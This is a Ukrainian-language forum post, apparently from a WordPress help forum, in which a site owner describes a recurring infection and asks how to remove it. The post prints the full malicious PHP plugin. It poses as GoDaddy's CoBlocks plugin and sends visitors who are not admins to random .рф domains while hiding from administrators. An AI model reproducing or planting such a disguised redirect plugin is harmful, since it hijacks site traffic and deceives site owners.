• Всім доброго доброго дня.
    Нещодавно на одному із сайтів появився вірус якого до цього часу ще не бачив.
    Сайт створений в 2017 році.
    Хворів вірусом «WP-VCD Malware».
    Тема ліцензійна куплена.
    Вірус редиректить на інші сайти. Після видалення за кілька днів появляється інший плагін з іншою назвою код вірусу ідентичний.
    Підкажіть в яку сторону копати. Пробував гуглити код вірусу ніде про нього ще не пишуть.

    <?php
    /*
    Plugin Name: Page Builder Gutenberg Blocks – CoBlocks 
    Plugin URI:  https://uk.wordpress.org/plugins/coblocks/
    Description: CoBlocks is the most innovative collection of page building WordPress blocks for the new Gutenberg WordPress block editor.
    Version:     2.11.2
    Author:      GoDaddy
    Author URI:  https://godaddy.com/
    License:     GPL2
    License URI: https://www.gnu.org/licenses/gpl-2.0.html
    */
    
    function Page_Builder() {
    	$KADM = current_user_can('manage_options');
    	$hhh = $_SERVER['HTTP_REFERER'];
    	$ALL_LIST = ['http://xn--80aa4ce2a.xn--p1ai','http://xn--80ad2akx.xn--p1ai','http://xn--j1amtse.xn--p1ai','http://xn--c1anqe5e.xn--p1ai','http://xn--80aj4ae6d.xn--p1ai','http://xn--h1aiml3a.xn--p1ai'];
    	$url = "";
    	if(!$KADM && !empty($hhh) && !replace_abc()){
    		header("Location: ".$ALL_LIST[array_rand($ALL_LIST)]);
    		exit();
    	} else{}
    }
    function replace_abc() {
        return in_array($GLOBALS['pagenow'], array('wp-login.php', 'wp-register.php'));
    }
    add_action( 'wp_loaded', 'Page_Builder' );
    
    ?>